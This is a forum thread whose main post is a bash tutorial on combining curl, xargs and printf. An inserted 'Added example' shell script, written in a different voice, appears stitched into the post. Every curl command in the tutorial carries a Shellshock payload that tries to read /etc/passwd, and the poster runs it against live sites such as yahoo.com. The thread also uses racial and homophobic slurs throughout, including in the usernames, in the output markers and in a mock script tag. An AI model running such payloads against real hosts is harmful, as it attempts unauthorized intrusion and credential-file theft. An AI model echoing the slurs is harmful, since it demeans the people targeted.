Posts by F.E. Allen

  1. F.E. Allen P-TRANNY
    Posting from my dev account because fucking vb lets admins insert arbitrary html and it's fucking things up. Anyway.

    The nice thing about bash is that it has a really good REPL, even if we never think of it like that, so punching stuff into the command line to test step-by-step works well. So, assuming xargs is working right, we would expect curl to be invoked with URLs repeatedly, so let's start from there:

    [lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
    <!DOCTYPE html>
    <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
    <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
    <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
    <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
    <head>
    <title>Access denied | niggasin.space used CloudFlare to restrict access</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

    Well that works, now let's try to tack on the printf:

    [lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | printf "%b \n\n"
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    100 3467 0 3467 0 0 101k 0 --:--:-- --:--:-- --:--:-- 102k
    (23) Failed writing body
    [lanny:~]$

    Well that's interesting, let us contemplate the man page:

    [lanny:~]$ man -P cat printf
    PRINTF(1) BSD General Commands Manual PRINTF(1)

    NAME
    printf -- formatted output

    SYNOPSIS
    printf format [arguments ...]

    DESCRIPTION
    The printf utility formats and prints its arguments, after the first, under control of the format. The format is a
    character string which contains three types of objects: plain characters, which are simply copied to standard out-
    put, character escape sequences which are converted and copied to the standard output, and format specifications,
    each of which causes printing of the next successive argument.

    My emphasis added. printf operates on its arguments, as opposed to stdin, which means it can't take input from a pipe on its own (pipes take the stdout of the left-hand side and feed it to the stdin of the right). The distinction may seem trivial, but it's important to understand and is the main reason we have xargs (you can think of xargs as a utility for transforming stdin into arguments), so let's try that:

    [lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | xargs printf "%b NIGGA\n"
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    100 3467 0 3467 0 0 105k 0 --:--:-- --:--:-- --:--:-- 105k
    <!DOCTYPE NIGGA
    html> NIGGA
    <!--[if NIGGA
    lt NIGGA
    IE NIGGA
    7]> NIGGA
    <html NIGGA
    class=no-js ie6 oldie NIGGA
    lang=en-US> NIGGA


    Changed printf to `printf "%b NIGGA\n"` just because that's easier to identify than a newline. So we're getting closer, but I'm assuming you were trying to put a double newline between the results of each request rather than just at the end of each line. To do that we need to get a little trickier; let's try:

    [lanny:~]$ echo "http://niggasin.space/\nhttp://yahoo.com/" | xargs -t -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'
    bash -c curl http://niggasin.space/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----
    <!DOCTYPE html>
    <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
    <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
    <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
    <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
    <head>
    <title>Access denied | niggasin.space used CloudFlare to restrict access</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
    <meta name="robots" content="noindex, nofollow" />
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />
    <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />
    <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
    <style type="text/css">body{margin:0;padding:0}</style>
    <!--[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script><![endif]-->
    <!--[if gte IE 10]><!--><script type="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></script><!--<![endif]-->
    <script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"></script>

    </head>
    <body>
    <div id="cf-wrapper">
    <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
    <div id="cf-error-details" class="cf-error-details-wrapper">
    <div class="cf-wrapper cf-header cf-error-overview">
    <h1>
    <span class="cf-error-type" data-translate="error">Error</span>
    <span class="cf-error-code">1012</span>
    <small class="heading-ray-id">Ray ID: 257e65cd668011d1 &bull; 2015-12-20 21:21:34 UTC</small>
    </h1>
    <h2 class="cf-subheadline" data-translate="error_desc">Access denied</h2>
    </div><!-- /.header -->

    <section></section><!-- spacer -->

    <div class="cf-section cf-wrapper">
    <div class="cf-columns two">
    <div class="cf-column">
    <h2 data-translate="what_happened">What happened?</h2>
    <p>The owner of this website (niggasin.space) has forbidden your access based on malicious activity detected from your computer or your network (73.222.180.57). The most likely cause of this is a virus or malware infection on your machine. Please update your anti-virus software and run a full system scan.</p>
    </div>


    </div>
    </div><!-- /.section -->

    <div class="cf-error-footer cf-wrapper">
    <p>
    <span class="cf-footer-item">CloudFlare Ray ID: <strong>257e65cd668011d1</strong></span>
    <span class="cf-footer-separator">&bull;</span>
    <span class="cf-footer-item"><span data-translate="your_ip">Your IP</span>: 73.222.180.57</span>
    <span class="cf-footer-separator">&bull;</span>
    <span class="cf-footer-item"><span data-translate="performance_security_by">Performance &amp; security by</span> <a data-orig-proto="https" data-orig-ref="www.cloudflare.com/5xx-error-landing?utm_source=error_footer" id="brand_link" target="_blank">CloudFlare</a></span>

    </p>
    </div><!-- /.error-footer -->


    </div><!-- /#cf-error-details -->
    </div><!-- /#cf-wrapper -->

    <script type="text/javascript">
    window._cf_translation = {};


    </script>

    </body>
    </html>
    ----END OF RESPONSE----
    bash -c curl http://yahoo.com/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----
    <HTML>
    <HEAD>
    <TITLE>Error</TITLE>
    </HEAD>

    <BODY BGCOLOR="white" FGCOLOR="black">
    <!-- status code : 301 -->
    <!-- Error: GET -->
    <!-- host machine: ir13.fp.ne1.yahoo.com -->
    <!-- timestamp: 1450646494.000 -->
    <!-- url: http://yahoo.com/-->
    <H1>Error</H1>
    <HR>

    <FONT FACE="Helvetica,Arial"><B>
    Description: Could not process this "GET" request.
    </B></FONT>
    <HR>
    </BODY>
    ----END OF RESPONSE----


    There we go. So let's look at why that works; here's our command:

    echo "http://niggasin.space/\nhttp://yahoo.com/" | xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'


    So the left side of that pipe is just producing something for xargs to chew on. The "-t" flag just says "show me the command you're about to execute before you do it", which is why we see things like `bash -c curl http://yahoo.com/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----` in the output. You'll probably want to pull that flag out when actually using it; it's mostly for debugging. The "-I %" flag says "replace every instance of '%' that occurs in the strings passed to xargs with the args formed from stdin".

    So what we want to do for each line of input is execute two commands, one for curl and one to insert our end-of-response marker. The idea of piping the output of xargs to printf was a good one, but just by the nature of the execution model, xargs doesn't indicate the difference between one invocation of its command and the next; it just produces a continuous stream, so with your original command printf would only be invoked once rather than once per execution of curl. So what we do here is execute "bash -c", which is just "start bash, run the command following -c, and exit" and is generally how you go from commands you build as strings to execution. So anyway, xargs does the % replace thing and then we run bash, which in turn runs curl and echo, then xargs moves on to the next item and does it all over again.

    Notice the single quote just before curl and its pair at the end: in bash-like shells single quotes are used for non-interpolated strings, so things like $VAR don't happen, you can use double quotes without escaping them, and so on. Useful when you're writing a string with syntax the (top level) shell would otherwise try to parse.

    There are probably other, probably better ways of doing this, but it works as a one-liner, so there you go. Would be interested if aldra has anything cleverer or cleaner (I've always felt like invoking sub-shells is kind of a kludge, but I see it often enough that I think it's accepted as common practice).
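    Added example, not from the post above (which runs curl against live hosts): the three stages the post walks through, run offline against a constructed URL list with a printf stand-in for curl; the function names, the URLs and the fake response text are all constructed here. It also hands each input line to sh -c as $1 rather than splicing it into the script text, so a line containing quotes or ';' is treated as data and not parsed as shell code.

```sh
#!/bin/sh
# Added example, not from the original post: the three stages of the post,
# run offline. The "response" text and the URL list are constructed here.

# Constructed input: one URL per line, the shape the post feeds to xargs.
# The third line carries a ';' to show it is passed through literally.
URLS='http://a.example/
http://b.example/
http://c.example/?q=a;b'

# Stage 1: printf reads its format and arguments, never stdin, so it runs
# once with no arguments and the piped data is simply not read.
# Returns the number of lines printf produced (1).
stage_pipe_to_printf() {
    printf '%s\n' "$URLS" | printf '%b\n' | wc -l | tr -d ' '
}

# Stage 2: xargs turns stdin into arguments, but by default hands ALL the
# tokens to ONE printf, which recycles its format for each argument. Every
# token gets a marker, yet nothing separates one request from the next.
stage_xargs_printf() {
    printf '%s\n' "$URLS" | xargs printf '%s <- token\n'
}

# Stage 3: -I runs the utility once per input line, and sh -c lets that one
# run be a command group: fetch, then print a delimiter. The line is handed
# to sh as $1 ("_" fills $0) instead of being spliced into the script text,
# so a line containing quotes or ';' cannot change what the script does.
stage_xargs_per_line() {
    printf '%s\n' "$URLS" | xargs -I {} sh -c '
        printf "<html>%s</html>\n" "$1"   # stand-in for: curl "$1"
        echo "----END OF RESPONSE----"
    ' _ {}
}

# One delimiter per input line is the behaviour the post was after.
count_delimiters() {
    stage_xargs_per_line | grep -c -- '^----END OF RESPONSE----$'
}
```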
  2. F.E. Allen P-TRANNY
    fite me irl
  3. F.E. Allen P-TRANNY
    1, 2, 3... <script src="niggers.js">faggots
  4. F.E. Allen P-TRANNY
    John Coltrane, have my body for I am yours!